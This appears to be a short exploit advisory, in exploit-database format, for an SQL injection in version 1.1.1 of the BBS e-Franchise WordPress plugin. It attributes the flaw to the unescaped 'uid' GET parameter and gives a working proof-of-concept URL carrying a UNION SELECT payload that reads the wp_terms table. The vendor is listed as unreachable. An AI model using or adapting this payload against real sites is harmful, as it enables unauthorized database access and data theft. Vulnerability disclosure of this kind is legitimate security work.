27 lines
No EOL
923 B
Text
27 lines
No EOL
923 B
Text
# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection
|
||
# Date: 12/11/2016
|
||
# Exploit Author: Lenon Leite
|
||
# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
|
||
# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
|
||
# Contact: http://twitter.com/lenonleite
|
||
# Website: http://lenonleite.com.br/
|
||
# Category: webapps
|
||
# Version: 1.1.1
|
||
# Tested on: Windows 8.1
|
||
|
||
1 - Description:
|
||
|
||
$_GET[‘uid’] is not escaped. Url is accessible for any user.
|
||
I will have find post or page that usage plugin, that use shortcode
|
||
|
||
http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/
|
||
|
||
|
||
2 - Proof of Concept:
|
||
|
||
http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
|
||
|
||
|
||
3 - Timeline:
|
||
12/11/2016 - Discovered
|
||
12/11/2016 - vendor not found |